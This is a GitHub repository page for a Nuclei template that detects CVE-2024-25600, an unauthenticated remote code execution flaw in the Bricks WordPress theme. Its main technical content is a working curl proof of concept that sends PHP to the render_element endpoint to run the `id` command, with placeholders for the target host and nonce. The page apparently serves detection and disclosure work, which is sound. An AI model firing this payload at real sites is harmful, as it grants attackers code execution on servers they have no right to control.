Skip to content

Nuclei template and information about the POC for CVE-2024-25600

Notifications You must be signed in to change notification settings

Christbowel/CVE-2024-25600_Nuclei-Template

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 

Repository files navigation

CVE-2024-25600_Nuclei-Template

Nuclei template and information about the POC for CVE-2024-25600

Description 📝

The Bricks theme for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.9.6. This makes it possible for unauthenticated attackers to execute code on the server. This template 🛠️ is designed to detect the CVE-2024-25600 vulnerability 🕳️ found in the Bricks Builder plugin for WordPress using nuclei. The vulnerability allows for unauthenticated remote code execution on affected websites 💻.

Proof of Concept (PoC) 📝

The Complete POC (automatic) is avaible at https://github.com/chocapikk/CVE-2024-25600.

The base PoC provided by the disclosure is as follows:

curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}'

Replace [HOST] with the target website and [NONCE] with the nonce value retrieved from the site.

Reference 📖

For more information about the CVE-2024-25600 vulnerability, please refer to the detailed disclosure at Snicco.io.

About

Nuclei template and information about the POC for CVE-2024-25600

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published